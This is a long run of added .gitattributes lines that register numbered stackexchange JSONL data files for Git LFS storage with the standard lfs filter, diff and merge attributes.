+data/stackexchange/1-1/1937_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1938_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1939_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/193_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1940_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1941_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1942_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1943_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1944_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1945_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1946_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1947_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1948_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1949_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/194_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1950_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1951_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1952_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1953_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1954_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1955_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1956_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1957_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1958_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1959_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/195_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1960_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1961_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1962_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1963_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1964_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1965_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1966_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1967_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1968_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1969_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/196_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1970_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1971_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1972_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1973_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1974_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1975_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1976_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1977_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1978_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1979_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/197_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1980_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1981_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1982_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1983_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1984_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1985_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1986_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1987_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1988_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1989_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/198_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1990_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1991_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1992_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1993_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1994_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1995_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1996_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1997_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1998_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1999_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/199_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/19_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2000_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2001_2289.jsonl filter=lfs 
diff=lfs merge=lfs -text +data/stackexchange/1-1/2002_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2003_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2004_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2005_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2006_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2007_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2008_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2009_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/200_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2010_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2011_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2012_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2013_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2014_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2015_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2016_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2017_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2018_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2019_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/201_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2020_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2021_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2022_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2023_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2024_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2025_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2026_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2027_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2028_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2029_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/202_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2030_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2031_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2032_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2033_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2034_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2035_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2036_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2037_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2038_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2039_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/203_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2040_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2041_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2042_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2043_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/2044_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2045_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2046_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2047_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2048_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2049_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/204_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2050_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2051_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2052_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2053_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2054_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2055_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2056_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2057_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2058_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2059_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/205_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2060_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2061_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2062_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2063_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2064_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2065_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2066_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2067_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2068_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2069_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/206_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2070_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2071_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2072_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2073_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2074_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2075_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2076_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2077_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2078_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2079_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/207_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2080_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2081_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2082_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2083_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2084_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2085_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2086_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/2087_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2088_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2089_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/208_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2090_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2091_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2092_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2093_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2094_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2095_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2096_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2097_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2098_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2099_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/209_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/20_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2100_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2101_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2102_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2103_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2104_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2105_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2106_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2107_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2108_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2109_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/210_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2110_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2111_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2112_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2113_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2114_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2115_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2116_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2117_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2118_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2119_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/211_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2120_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2121_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2122_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2123_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2124_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2125_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2126_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2127_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2128_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2129_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/212_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2130_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2131_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2132_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2133_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2134_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2135_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2136_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2137_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2138_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2139_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/213_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2140_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2141_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2142_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2143_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2144_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2145_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2146_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2147_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2148_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2149_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/214_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2150_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2151_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2152_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2153_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2154_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2155_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2156_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2157_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2158_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2159_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/215_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2160_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2161_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2162_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2163_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2164_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2165_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2166_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2167_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2168_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2169_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/216_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/2170_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2171_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2172_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2173_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2174_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2175_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2176_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2177_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2178_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2179_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/217_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2180_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2181_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2182_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2183_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2184_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2185_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2186_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2187_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2188_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2189_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/218_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2190_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2191_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2192_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2193_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2194_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2195_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2196_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2197_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2198_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2199_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/219_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/21_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2200_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2201_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2202_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2203_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2204_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2205_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2206_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2207_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2208_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2209_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/220_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2210_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2211_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/2212_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2213_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2214_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2215_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2216_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2217_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2218_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2219_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/221_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2220_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2221_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2222_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2223_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2224_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2225_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2226_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2227_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2228_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2229_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/222_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2230_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2231_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2232_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2233_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2234_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2235_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2236_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2237_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2238_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2239_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/223_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2240_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2241_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2242_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2243_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2244_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2245_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2246_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2247_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2248_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/2249_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/224_2289.jsonl filter=lfs diff=lfs merge=lfs -text 